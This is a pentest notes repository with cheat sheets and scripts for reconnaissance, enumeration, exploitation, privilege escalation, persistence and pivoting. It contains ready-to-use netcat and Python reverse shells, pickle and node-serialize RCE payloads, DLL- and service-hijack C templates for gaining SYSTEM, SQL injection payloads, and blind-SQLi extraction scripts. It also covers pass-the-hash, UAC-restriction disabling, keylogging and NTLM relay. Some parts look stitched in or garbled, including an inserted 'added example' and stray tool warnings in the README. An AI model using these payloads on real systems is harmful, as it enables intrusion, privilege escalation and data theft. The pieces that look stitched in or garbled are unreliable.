├── docs
│   ├── bruteforcing.md
│   ├── misc.md
│   ├── pivoting.md
│   ├── osint-gmail.md
│   ├── persistence.md
│   ├── reverseshells.md
│   ├── pillaging.md
│   ├── gather-info.md
│   ├── enumerate.md
│   ├── exploit-general.md
│   ├── scanning.md
│   ├── osint-cheatsheet.md
│   ├── privesc.md
│   ├── shellcode.md
│   ├── exploit-win-py3-bof.md
│   └── king-of-the-hill.md
├── scripts
│   ├── rpc-getusers.sh
│   ├── windows_dll.c
│   ├── sqli_blind.sh
│   ├── windows_service.c
│   └── fftstego_picture.py
└── README.md

/docs/bruteforcing.md:
--------------------------------------------------------------------------------
# Bruteforcing

## [⬅ Back to Index](../README.md)

---

## Patator

### SSH

* `-x ignore:code=1` - ignore the failed-login result (code 1) so only valid credentials are printed
--------------------------------------------------------------------------------
/scripts/rpc-getusers.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Usage: ./rpc-getusers.sh <target> [extra rpcclient args]
# Checks each candidate username with a null-session `lookupnames` call
# (alternative to RID cycling). Only "User:" type results are printed.
[ -z "$1" ] && { echo "usage: $0 <target> [rpcclient args]" >&2; exit 1; }
# Use linux-default-installs repo to set up the symlink used below (seclists)
while read -r user; do
  [ -z "$user" ] && continue
  rpcclient -U "" "$@" -N --command="lookupnames $user" \
    | grep -i "user:" \
    || echo "User ${user} not found or access denied."
done < /opt/wordlist-users-names.txt
--------------------------------------------------------------------------------
/docs/misc.md:
--------------------------------------------------------------------------------
# Miscellaneous

## [⬅ Back to Index](../README.md)

---

## Stego

* [McAfee check for steganography in files](https://www.mcafee.com/enterprise/en-us/downloads/free-tools/steganography.html)

## Social Engineering

* [LinDrop - Linux Desktop file spoofing](https://github.com/securemode/LinDrop/blob/master/LinDrop.py)

## Tunneling

### DNS

* [Iodine DNS Tunnel](https://github.com/yarrick/iodine)
--------------------------------------------------------------------------------
/scripts/windows_dll.c:
--------------------------------------------------------------------------------
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o revshell.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o revshell.dll

#include <windows.h>
#include <stdlib.h>

// The payload runs as soon as the DLL is mapped into the (higher privileged) process
// that loads it, e.g. via a writeable DLL search path. Replace the system() command
// with the real payload; ExitProcess() stops the host process afterwards.
BOOL WINAPI DllMain(HINSTANCE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k whoami /all > c:\\temp\\revshell.txt");
        ExitProcess(0);
    }
    return TRUE;
}
--------------------------------------------------------------------------------
/docs/pivoting.md:
--------------------------------------------------------------------------------
# Pivoting

## [⬅ Back to Index](../README.md)

---

## Metasploit General

* `run autoroute -s ` (inside a session)
* `use post/multi/manage/autoroute` -> `set session x` -> `run`
* `use auxiliary/server/socks4a` - Set up a local SOCKS4a proxy (newer Metasploit versions merged this into `auxiliary/server/socks_proxy`, `set VERSION 4a`; default `SRVPORT` is 1080)
* Configure proxychains4 (/etc/proxychains.conf) to route through this proxy (replace the default `socks4 127.0.0.1 9050` entry with the proxy's port)

## Remote Dynamic Port Forward

>todo

## Exploit through Double Pivot

>todo

## Local Dynamic Port Forward

>todo
--------------------------------------------------------------------------------
/scripts/sqli_blind.sh:
--------------------------------------------------------------------------------
#!/usr/bin/env bash
# Usage: ./sqli_blind.sh <url> <maxlength> "<subquery>"
#   e.g. ./sqli_blind.sh http://target/page.php 32 "select @@version"
# Boolean-based blind extraction, one request per candidate character, using substring().
# Adjust the injected parameter ("parameter=true_return'") to match the vulnerable request.

# A string that only appears in the response when the injected condition is true
export checkstring="Enter DOM return behaviour here for boolean true response"

# {a..Z} in bash expands through the ASCII range between 'a' and 'Z' (including [ \ ] ^ _ `),
# so lower and upper case are listed as separate ranges.
charset=$(echo {0..9} {a..z} {A..Z} \. \: \, \; \- \_ \@)
export url="$1"
export maxlength="$2"
export query="$3"
export result=""

echo "Extracting results for the $query:"
for ((j=1;j<=maxlength;j+=1))
do
  export nchar=$j
  for i in $charset
  do
    # -O - writes the response to stdout; -q silences wget's own output
    if wget "$url?parameter=true_return' and substring(($query),$nchar,1)='$i" -q -O - | grep -q "$checkstring"
    then
      echo "Character number $nchar found: $i"
      export result+=$i
      break
    fi
  done
done

echo "Result: $result"
--------------------------------------------------------------------------------
/docs/osint-gmail.md:
--------------------------------------------------------------------------------
# Gmail account OSINT

## [⬅ Back to Index](../README.md)

---

## Get `@gmail.com` Google ID

The ID should look like `101299910324306641283`

### Hangouts Method

(Google Hangouts has since been retired, so this method no longer works as written.)

1. https://hangouts.google.com/
2. Click `New conversation`
3. Open the network tab in developer tools (F12)
4. Look through the requests and locate the JSON response that contains the email address
5. Copy the `"personId"` value

### Use online tools to get ID

* 

## View public content from that user

Suffix the ID you have to each link and visit:

* Maps reviews and photos - 
* Public photos - 
* Public drive - 
* Youtube channel - 

## Bonus

Automated method (using selenium chromedriver) to do the above, with less granularity (the text of their reviews is not shown):

* 
--------------------------------------------------------------------------------
/docs/persistence.md:
--------------------------------------------------------------------------------
# Persistence

## [⬅ Back to Index](../README.md)

---

## General

### Metasploit (General)

* Execute programs - `execute -f /program -i -c`
* Local Port forward - `portfwd add -l 8080 -p 80 -r x.x.x.x`

## Windows

### Enable psexec usage (Pass-The-Hash)

* `reg setval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1`
  * Disables UAC remote restrictions, so local (non-RID-500) administrator accounts get a full admin token over the network; psexec / Pass-The-Hash with local accounts needs this.

### Autorun

* `reg setval -k HKLM\software\microsoft\windows\currentversion\run -d "" -v `

### Metasploit (Win)

* Dump hashes:
  * `hashdump`
  * `run post/windows/gather/smart_hashdump`
* Enable RDP (currently supported method) - `run post/windows/manage/enable_rdp`
* Impersonation - `use incognito` -> `list_tokens -u` -> `impersonate_token `

### Other Scripts / Git Resources

* [UACME - UAC Bypass Techniques](https://github.com/hfiref0x/UACME)
* [Veil-Evasion (Veil 3+)](https://github.com/Veil-Framework/Veil)
* RDP Clients for Linux:
  * `rdesktop`
  * `xfreerdp /u:user /pth: /v:x.x.x.x` (RDP with Pass-The-Hash functionality - "freerdp-x11" in package manager; the target must have Restricted Admin mode enabled, otherwise the NTLM hash is not accepted for the interactive logon)
--------------------------------------------------------------------------------
/docs/reverseshells.md:
--------------------------------------------------------------------------------
# Reverse Shells

## [⬅ Back to Index](../README.md)

---

```bash
= your attack station ip
```

## Plain Bash Netcat

```bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f
```

## Python2 / Python3

```bash
/usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
```

## Python Class Injection (Bash Netcat)

Generates a base64 pickle; `pickle.loads()` of it on the target calls `os.system(cmd)` because `__reduce__` tells the unpickler which callable to run.

```python
import pickle
import sys
import base64

cmd = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f'

class rce(object):
    def __reduce__(self):
        import os
        return (os.system,(cmd,))

print(base64.b64encode(pickle.dumps(rce())))
```

## NodeJS Module - node-serialize Injection (Bash Netcat)

The `_$$ND_FUNC$$_` prefix makes node-serialize `eval` the function on unserialize; the trailing `()` turns it into an IIFE so it runs without being called by the application.

```js
_$$ND_FUNC$$_function (){x=require('child_process').exec('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat 8888 > /tmp/f', function(error, stdout, stderr) { console.log(stdout) });return x;}()
```
--------------------------------------------------------------------------------
/docs/pillaging.md:
--------------------------------------------------------------------------------
# Pillaging

## [⬅ Back to Index](../README.md)

---

## General

### MSF

* **Keylogging**
  * `keyscan_start`
  * `keyscan_dump` - Dump all captured keystrokes
  * >todo
* **Gather live hosts on netblock**
  * `use post/multi/gather/ping_sweep`
  * `use post/windows/gather/arp_scanner` (Win Beacon)
  * `run arp_scanner -r x.x.x.x/24`

### Spoofing

* Enable IP forwarding - `echo 1 > /proc/sys/net/ipv4/ip_forward`
* Use `arpspoof`, `bettercap`, or `ettercap`

### Shares

* CIFS mount - `mount -t cifs ///share /mnt/lolz -o rw,vers=1.0,user=,password=` (`vers=1.0` only for SMBv1-only targets; use `vers=2.0`/`3.0` otherwise)

## Windows

### Powershell Empire

* [PowerSploit - PowerView](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
  * `Get-NetComputer` / `Get-NetComputers -full`
  * `Get-NetShare`
  * `Get-NetUser`

### MSF (Win)

* Auto enum - `run winenum`
* Privs - `run post/windows/gather/win_privs`

### Windows - Other Scripts / Git Resources

* SessionGopher (WMI methods of gathering session info) - 

## Linux

### MSF (Linux)

### Linux - Other Scripts / Git Resources

* [3snake (Gather creds from new processes)](https://github.com/blendin/3snake)
--------------------------------------------------------------------------------
/docs/gather-info.md:
--------------------------------------------------------------------------------
# Public Information Gathering

## [⬅ Back to Index](../README.md)

---

## Business Information

### Generic

* [Job postings - Indeed](https://indeed.com/)
* [Community Reviews + Job postings - Glassdoor](https://www.glassdoor.com)
* [Company "Wiki" - Crunchbase](https://www.crunchbase.com)
* [Startups and private sector - INC](https://www.inc.com)
* [Financial - Google Search](https://www.google.com/finance)
* [People - Spokeo](https://www.spokeo.com)

### US Specific

* [DUNS + CAGE codes - System for Award Management - SAM](https://www.sam.gov/SAM/)
* [EDGAR - Electronic Data Gathering, Analysis and Retrieval system - SEC](https://www.sec.gov/edgar/search-and-access)
* [Job postings - Monster](https://www.monster.com)
* [People - PeopleFinders](https://www.peoplefinders.com)

### AU Specific

* [Job postings - Seek](https://www.seek.com.au)

## Harvesting Data

* [Automated - Spiderfoot](https://github.com/smicallef/spiderfoot)
* [Automated - FOCA - Fingerprinting Organizations with Collected Archives](https://www.elevenpaths.com/labstools/foca/index.html)
* [Automated - theHarvester](https://github.com/laramies/theHarvester)

## Archived Web Information

* [AU - Trove](https://webarchive.nla.gov.au/collection)
* [Generic - Archive.org](https://web.archive.org)
* [Generic - Archive.today](https://archive.today)
* Generic - Google Cache Search: "cache:[websitehere]" without brackets
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# poor-mans-pentest-notes

Notes for efficient and easier engagements - my collection for when I'm feeling lazy.

---

## [OSINT Cheatsheet](docs/osint-cheatsheet.md) / [Gmail OSINT](docs/osint-gmail.md)

## [Public Information Gathering](docs/gather-info.md)

## [Scanning](docs/scanning.md)

## [Enumeration](docs/enumerate.md)

## [Reverse Shells](docs/reverseshells.md)

## [Privilege Escalation](docs/privesc.md)

## [Exploitation](docs/exploit-general.md)

## [Persistence](docs/persistence.md)

## [Pillaging](docs/pillaging.md)

## [Pivoting](docs/pivoting.md)

## [Miscellaneous Notes](docs/misc.md)

## Uncategorized

* [Windows Shellcode Notes](docs/shellcode.md) - (Bonus Antivirus undetectable payload packing)
* [King of the Hill - Adversary simulation - TryHackMe](docs/king-of-the-hill.md)
* [Buffer Overflow with Python 3 struggle resolution (warning: very hacky, uses Powershell)](docs/exploit-win-py3-bof.md)
* [RunFinger.py historical version with MS17-010 check still present (python2)](https://github.com/lgandx/Responder/blob/daaf6f7296ee754fe37b2382d0e459f7b6e74dcc/tools/RunFinger.py)
* [Passwords - Bruteforcing Services](docs/bruteforcing.md)
* [Steganography - Fast Fourier Transform Image Revealer](scripts/fftstego_picture.py)
  * WARNING : block size exceeding max block size at 0x006bc860
  * [+] Try changing it with e anal.bb.maxsize

---

> Under construction forever

*Currently transcribing relevant content from notion: *
--------------------------------------------------------------------------------
/docs/enumerate.md:
--------------------------------------------------------------------------------
# Enumeration

## [⬅ Back to Index](../README.md)

---

## General

### RPC

#### Users

* `./scripts/rpc-getusers.sh` - Use a list of potential usernames to check their existence via rpcclient null session (alternative to RID bruteforce)

### SNMP

* Gather targets: `onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt `
* `snmpwalk -v2c -c `
* `snmpenum `
  * The config file argument is one of:
    * linux.txt
    * windows.txt
    * cisco.txt

### NTLM Relay

* Using crackmapexec (automation) to list hosts without SMB signing, i.e. valid relay targets
  * `pip3 install pipx`
  * `pipx ensurepath`
  * `pipx install crackmapexec`
  * `cme smb --gen-relay-list lol.txt`
* Responder
  * Edit Responder.conf and set `SMB = Off` (and `HTTP = Off`) so that ntlmrelayx can bind those ports instead
  * `responder -I tun0 -r -d -w`
* NTLM Relay using output
  * `ntlmrelayx.py -tf lol.txt` (add `-smb2support` for targets that only speak SMB2/3)

### NetBIOS

* Win: `nbtstat -a `
* Lin: `nmblookup -A `
  * `<20>` (File Server service suffix) indicates file shares
* `enum4linux -USGPoni `

## Linux

> todo

## Windows

### MSF

* Applications: `run post/windows/gather/enum_applications`

## Web

`/EyeWitness.py -f urls.txt --web --proxy-ip 127.0.0.1 --proxy-port 8080 --proxy-type socks5 --timeout 120`

### DNS

#### Zone Transfer

* `dig -t AXFR +nocookie @`

### Trace route

* Identify gateway
  * `traceroute -m x`
  * `route` (local)
  * Windows - `winmtr`

### CMS

#### Wordpress

* 
* 

#### Joomla

* 

#### Drupal

* 
--------------------------------------------------------------------------------
/docs/exploit-general.md:
--------------------------------------------------------------------------------
# General Exploitation

## [⬅ Back to Index](../README.md)

---

## Windows

### MSF

* PSExec Scanner (Multi-load)
  * `use auxiliary/scanner/smb/psexec_scanner`

## Linux

### Linux File manipulation

* Create files with weird characters (used for globbing manipulation, e.g. to smuggle flags into a wildcard expansion):

`touch -- "--file-with=weird characters"`

## Web

### SQL Injection

#### SQLMap

* `sqlmap -u --data "{ \"user\": \"1\"}" --tamper=charunicodeescape --dbms= --technique=`
  * Techniques:
    * Default - all
    * T - time based
* `sqlmap -r `
  * Reads URL, method and data/parameters from a file in the format of a network request export (e.g. from Burp).

#### MSSQL

* Error-based SQLi
  * General: `or 1 in (SELECT TOP 1 CAST(query as varchar(4096))) -- -`
    * Where `query` is anything like:
      * `@@version`
      * `user_name()`
      * `db_name(N)` - database name for ID `N` (the databases listed in `master..sysdatabases`)
  * Get tables: `or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM db..sysobjects where xtype='U' and name not in ('','')); -- -`
    * Where `db` is the database name and `'',''` is a growing list of the tables found so far, starting from the blank `''` when none are known; each conversion error leaks one more table name.
  * Columns: `db..syscolumns.name`
  * Data: `db..table where column not in ('')`
  * Casting to varchar to trigger errors: `CAST(id as varchar)+char(59)` (urlencode `+` as `%2b` if needed)
    * The conversion error message contains the value followed by `;` (char(59)); appending the `;` is what makes the implicit conversion back to a number fail and leak the value.

#### MySQL

* Error-based SQLi
  * General: `union select count(*), concat(value, floor(rand(0)*2)) as z from information_schema.tables group by z;`
    * `rand(0)` is evaluated twice per row inside the `group by`, which produces a duplicate key error whose message contains `value`.

#### PostgreSQL

* Error-based SQLi
  * General: `select cast(query as numeric);` (the "invalid input syntax for type numeric" error quotes the value)
    * `version()`
    * `(select table_name from information_schema.tables limit 1 offset x)` - offset 0,1,2,etc...
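
The boolean-based blind extraction that `scripts/sqli_blind.sh` performs (one request per candidate character, walking a charset) can be made far cheaper by binary-searching the character's code point, which is what the following added example shows. It is not code from these notes: the in-memory SQLite database, the sample rows and the `vulnerable_page` endpoint are constructed here to stand in for a target, and the SQLite function names `unicode()`/`substr()` correspond to `ascii()`/`substring()` on MySQL or MSSQL. The `CHECKSTRING` plays the same role as `checkstring` in the shell script.

```python
import sqlite3

# Constructed stand-in for the target's backend database (sample data, not from the notes).
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users(username, password) VALUES ('admin', 'S3cret:Pa55@example');
INSERT INTO users(username, password) VALUES ('bob', 'hunter2');
CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, public INTEGER);
INSERT INTO products(name, public) VALUES ('widget', 1);
""")

# Marker that only appears in the response when the injected condition is true
# (same role as checkstring in sqli_blind.sh).
CHECKSTRING = "Found product"

_requests = 0


def vulnerable_page(param):
    """Hypothetical endpoint: the parameter is concatenated straight into the query."""
    sql = "SELECT name FROM products WHERE public=1 AND name='" + param + "'"
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error:
        return "Error"
    return "Found product: " + rows[0][0] if rows else "No product"


def oracle(condition):
    """One 'request': inject a boolean condition after the closing quote and report
    whether the true-marker rendered. The trailing AND ''=' re-closes the quote."""
    global _requests
    _requests += 1
    return CHECKSTRING in vulnerable_page("widget' AND (" + condition + ") AND ''='")


def request_count():
    """Number of oracle calls made so far (to compare against a charset walk)."""
    return _requests


def extract(subquery, max_length=64):
    """Recover the scalar result of `subquery` one character at a time.
    Each character is found by binary search on its code point, so it costs
    about 7 oracle calls instead of one call per charset entry."""
    result = ""
    for pos in range(1, max_length + 1):
        lo, hi = 0, 127          # ASCII range; raise hi for non-ASCII data
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # unicode(substr(x, pos, 1)) is NULL past the end of the string, so every
            # probe is false there, lo stays at 0 and the extraction stops.
            if oracle("unicode(substr((%s),%d,1)) >= %d" % (subquery, pos, mid)):
                lo = mid
            else:
                hi = mid - 1
        if lo == 0:
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(extract("select password from users where username='admin'"))
    print("requests:", request_count())
```

Against a real target, `oracle()` is the only piece to replace: send the payload in the vulnerable parameter (URL-encoded) and test the response for the marker, exactly as the `wget ... | grep` line does in the shell script.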
--------------------------------------------------------------------------------
/docs/scanning.md:
--------------------------------------------------------------------------------
# Scanning Notes

## [⬅ Back to Index](../README.md)

---

## ARP

* MSF's `arp_scanner`
* netdiscover - `sudo netdiscover` (requires root)

## MSF

* `use auxiliary/scanner/portscan/tcp`

## Nmap

### [Fast Pre-Nmap Port Scanner - Rustscan](https://github.com/RustScan/RustScan)

**Ref:**

1. [IANA service port assignments](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=)
2. [Free Online Scanning at HackerTarget](https://hackertarget.com/nmap-online-port-scanner/)
3. [Port listing on speedguide](https://www.speedguide.net/port.php?port=)

### ICMP Ping Sweep

* `nmap -sn `

### TCP Sweep

* `nmap -n -sn -PS22,139,445 `

### Preferred initial service ports

* `nmap -p 21,22,23,25,465,587,53,80,8080,443,8443,110,995,111,123,135,137,139,143,993,389,445,1025,1433,1723,2082-2083,2086-2087,3306,3389,5060,5432,5900,6001`

```text
21 - FTP
22 - SSH
23 - Telnet
25 - SMTP
465 - SMTP SSL
587 - SMTP TLS
53 - DNS
80 - HTTP
8080 - HTTP Proxy (Webcache)
443 - HTTP SSL
8443 - HTTP SSL Alternate
110 - POP
995 - POP SSL
111 - RPC Bind
123 - NTP
135 - MS RPC
137 - NetBIOS Name Service
139 - NetBIOS Session Service
143 - IMAP
993 - IMAP SSL
389 - LDAP
445 - MS DS (SMB)
1025 - NFS-or-IIS (nmap's name for it; often the first dynamic MS RPC endpoint)
1433 - MS SQL
1723 - PPTP
2082-2083 - CPanel
2086-2087 - CPanel WHM
3306 - MySQL
3389 - RDP
5060 - SIP
5432 - PostgreSQL
5900 - VNC
6001 - X Window Server
```

### Flags

* -Pn = No ping test (force port scan when ICMP is blocked)
* -n = No reverse DNS lookups (faster, and the resolver does not get to see which IPs are being scanned)
* -F = Reduced ports in default scan
* -oN = Output normal text to file
* -sV = Version enumeration
* -sC = Run the default NSE script set
* -sT = Force full TCP connect scan rather than the SYN scan, which is the default when running privileged
--------------------------------------------------------------------------------
/scripts/windows_service.c:
--------------------------------------------------------------------------------
#include <windows.h>
#include <stdlib.h>

#define SLEEP_TIME 5000

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);
void WINAPI ControlHandler(DWORD request);

// add the payload here (runs under the service account, usually SYSTEM)
int Run()
{
    system("whoami /all > c:\\windows\\temp\\service.txt");
    return 0;
}

int main()
{
    SERVICE_TABLE_ENTRY ServiceTable[2];
    ServiceTable[0].lpServiceName = "MyService";
    ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;

    ServiceTable[1].lpServiceName = NULL;
    ServiceTable[1].lpServiceProc = NULL;

    // Blocks until the service stops; fails if the exe is run directly instead of by the SCM
    StartServiceCtrlDispatcher(ServiceTable);
    return 0;
}

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
    ServiceStatus.dwServiceType = SERVICE_WIN32;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;

    hStatus = RegisterServiceCtrlHandler("MyService", (LPHANDLER_FUNCTION)ControlHandler);
    // The payload runs before RUNNING is reported: keep it short, or the SCM
    // will time out the start (the session still runs, but `sc start` errors)
    Run();

    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    SetServiceStatus(hStatus, &ServiceStatus);

    while (ServiceStatus.dwCurrentState == SERVICE_RUNNING)
    {
        Sleep(SLEEP_TIME);
    }
    return;
}

void WINAPI ControlHandler(DWORD request)
{
    switch(request)
    {
        case SERVICE_CONTROL_STOP:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;

        case SERVICE_CONTROL_SHUTDOWN:
            ServiceStatus.dwWin32ExitCode = 0;
            ServiceStatus.dwCurrentState = SERVICE_STOPPED;
            SetServiceStatus(hStatus, &ServiceStatus);
            return;

        default:
            break;
    }
    SetServiceStatus(hStatus, &ServiceStatus);
    return;
}
--------------------------------------------------------------------------------
/docs/osint-cheatsheet.md:
--------------------------------------------------------------------------------
# OSINT Cheatsheet Compilation

## [⬅ Back to Index](../README.md)

---

## Domains / Hosting / IP Intel

### My ratings glossary

```text
* **Free realestate** = *No captcha, no limits, can be used via Tor and no signup required.*
* Captcha = *Google reCaptcha or hCaptcha, etc.*
* Cloudflare = *Cloudflare routes the site, potential hCaptcha and Tor blocks.*
* Ratelimit = *Query limit per IP or blocks specific queries for free users.*
* Account = *Signup required (free but not anonymous).*
* China = *Blocks Tor*
```

### General recon services

* [//centralops.net](//centralops.net/co/) - **Free realestate**
* [//dnslytics.com](//dnslytics.com) - **Free realestate**
* [//networking.ringofsaturn.com](//networking.ringofsaturn.com/Tools/whois.php) - **Free realestate**
* [//hackertarget.com - server-info](//hackertarget.com/server-info/) - Ratelimit
* [//viewdns.info](//viewdns.info) - Cloudflare
* [//virustotal.com](//virustotal.com) - Captcha (on scan)
* [//urlscan.io](//urlscan.io) - Captcha

### Certificates

* [//crt.sh](//crt.sh) - **Free realestate**
* [//censys.io](//censys.io) - Ratelimit (10 searches per IP)

### CMS

* [//whatcms.org](https://whatcms.org) - Cloudflare

### DNS - Lookup & History

* [//dnsdumpster.com](//dnsdumpster.com) - **Free realestate**
* [//securitytrails.com](//securitytrails.com) - Captcha
* Append `websiteoutlook.com` to the domain name!

### Hosting - Email

* [//whoxy.com](//whoxy.com/whois-lookup/) - **Free realestate**
* [//whoisology.com](//whoisology.com) - Cloudflare

### Hosting - History

* [//hosterstats.com](//hosterstats.com) - **Free realestate** (Seems down! Oh no - 11th Aug 2020)

### Whois

* [//who.is](//who.is) - **Free realestate**
* [//gwhois.org](//gwhois.org) - **Free realestate**
* [//domainwat.ch](//domainwat.ch) - **Free realestate**
* [//whois.domaintools.com](//whois.domaintools.com) - Captcha
* [//whois.com](//whois.com/whois/) - Captcha
* [//whois.meshdigital.com](//whois.meshdigital.com) - Captcha

### IP Intelligence

* [//shodan.io](//shodan.io) - **Free realestate** (premium for filters)
* [//greynoise.io](//greynoise.io) - **Free realestate**
* [//abuseipdb.com](//abuseipdb.com) - **Free realestate**
* [//spyse.com](//spyse.com) - **Free realestate**
* [//threatcrowd.org](//threatcrowd.org) - **Free realestate**
* [//binaryedge.io](//binaryedge.io) - Account
* [//fofa.so](//fofa.so) - China
--------------------------------------------------------------------------------
/docs/privesc.md:
--------------------------------------------------------------------------------
# Privilege Escalation

## [⬅ Back to Index](../README.md)

---

## Windows

### Services

* Posh
  * Get all: `Get-WmiObject -Class Win32_Service|Format-Table -Property Name,DisplayName,PathName,StartMode`
  * Get specific service DACLs: `Get-Acl -Path hklm:\System\CurrentControlSet\services\`
* Hijack a service whose registry key (ImagePath) is writeable
  * `apt-get install gcc-mingw-w64`
  * `x86_64-w64-mingw32-gcc scripts/windows_service.c -o revshell.exe`
  * Copy `revshell.exe` to `C:\temp`
  * `reg add HKLM\SYSTEM\CurrentControlSet\services\service_with_access /v ImagePath /t REG_EXPAND_SZ /d c:\temp\revshell.exe /f`
  * `sc start service_with_access`
* Unquoted Service Paths
  * `sc qc `
  * `wmic service get name,displayname,pathname,startmode | findstr /i /v "c:\windows" | findstr /i /v """`

### DLLs

* Scan application DLLs for preloading attack: [Rattler](https://github.com/sensepost/rattler)
* Replace writeable DLL path with revshell
  * `apt-get install gcc-mingw-w64`
  * `x86_64-w64-mingw32-gcc scripts/windows_dll.c -shared -o revshell.dll` (use `i686-w64-mingw32-gcc` when the target process is 32-bit; a DLL of the wrong bitness will not load)
  * Copy `revshell.dll` to the path the service or app uses.
  * Restart the service or open the app that runs with higher privileges to trigger the DLL load.

### Registry

* Check if MSI packages install elevated (AlwaysInstallElevated, must be `1` under both HKCU and HKLM): `reg query HKCU\Software\Policies\Microsoft\Windows\Installer`
  * If so, use `-f msi` for venom payloads.
  * `msiexec /quiet /qn /i revshell.msi`

### Metasploit

* `run post/multi/recon/local_exploit_suggester`
* `sessions -u #` - Upgrade a plain shell session to Meterpreter (escalation to `NT AUTHORITY\SYSTEM` is a separate step, Meterpreter's getsystem)
* Windows Gather Privileges Enumeration Module - `post/windows/gather/win_privs`
* **All Reverse shells**
  * `setg InitialAutoRunScript migrate -n lsass.exe` - Auto stabilise by migrating out of the initial process (e.g. a service exe that the SCM kills when it fails to start, taking the stager with it)
  * Use `-f` on the above to spawn a new process (`notepad.exe`) and migrate into that instead (more conspicuous)
* **SSL Reverse Shells**
  1. Use `gather/impersonate_ssl` to clone the certificate of any live HTTPS site, e.g. google.com
  2. Build or use a payload with `reverse_https`
  3. `set handlersslcert ./` to the certificate location created in *Step 1*
  4. `set stagerverifysslcert true`
  5. `run`
  * The clone is self-signed, so it only makes the traffic look like the impersonated site and lets the stager pin the handler's cert; it will not pass real certificate validation.

### Hot Potato

* Posh module: 

### Find Exploits

* Suggest exploits for missing Windows KBs
  * Win 10: 
  * < Win 7: (*Deprecated)
--------------------------------------------------------------------------------
/scripts/fftstego_picture.py:
--------------------------------------------------------------------------------
import sys
import cv2
import numpy as np
from matplotlib import pyplot as plt

# Run this script against an image file to reveal potential FFT based stego
# Usage: python3 fftstego_picture.py <image>

if len(sys.argv) == 1:
    print("needs file path as first arg")
    sys.exit(1)

path = sys.argv[1]

cmaptypes_available = ['Accent', 'Accent_r', 'Blues', 'Blues_r', 'BrBG', 'BrBG_r', 'BuGn', 'BuGn_r', 'BuPu', 'BuPu_r', 'CMRmap', 'CMRmap_r', 'Dark2', 'Dark2_r', 'GnBu', 'GnBu_r', 'Greens', 'Greens_r', 'Greys', 'Greys_r', 'OrRd', 'OrRd_r', 'Oranges', 'Oranges_r', 'PRGn', 'PRGn_r', 'Paired', 'Paired_r', 'Pastel1', 'Pastel1_r', 'Pastel2', 'Pastel2_r', 'PiYG', 'PiYG_r', 'PuBu', 'PuBuGn', 'PuBuGn_r', 'PuBu_r', 'PuOr', 'PuOr_r', 'PuRd', 'PuRd_r', 'Purples', 'Purples_r', 'RdBu', 'RdBu_r', 'RdGy', 'RdGy_r', 'RdPu', 'RdPu_r', 'RdYlBu', 'RdYlBu_r', 'RdYlGn', 'RdYlGn_r', 'Reds', 'Reds_r', 'Set1', 'Set1_r', 'Set2', 'Set2_r', 'Set3', 'Set3_r', 'Spectral', 'Spectral_r', 'Wistia', 'Wistia_r', 'YlGn', 'YlGnBu', 'YlGnBu_r', 'YlGn_r', 'YlOrBr', 'YlOrBr_r', 'YlOrRd', 'YlOrRd_r', 'afmhot', 'afmhot_r', 'autumn', 'autumn_r', 'binary', 'binary_r', 'bone', 'bone_r', 'brg', 'brg_r', 'bwr', 'bwr_r', 'cividis', 'cividis_r', 'cool', 'cool_r', 'coolwarm', 'coolwarm_r', 'copper', 'copper_r', 'cubehelix', 'cubehelix_r', 'flag', 'flag_r', 'gist_earth', 'gist_earth_r', 'gist_gray', 'gist_gray_r', 'gist_heat', 'gist_heat_r', 'gist_ncar', 'gist_ncar_r', 'gist_rainbow', 'gist_rainbow_r', 'gist_stern', 'gist_stern_r', 'gist_yarg', 'gist_yarg_r', 'gnuplot', 'gnuplot2', 'gnuplot2_r', 'gnuplot_r', 'gray', 'gray_r', 'hot', 'hot_r', 'hsv', 'hsv_r', 'inferno', 'inferno_r', 'jet', 'jet_r', 'magma', 'magma_r', 'nipy_spectral', 'nipy_spectral_r', 'ocean', 'ocean_r', 'pink', 'pink_r', 'plasma', 'plasma_r', 'prism', 'prism_r', 'rainbow', 'rainbow_r', 'seismic', 'seismic_r', 'spring', 'spring_r', 'summer', 'summer_r', 'tab10', 'tab10_r', 'tab20', 'tab20_r', 'tab20b', 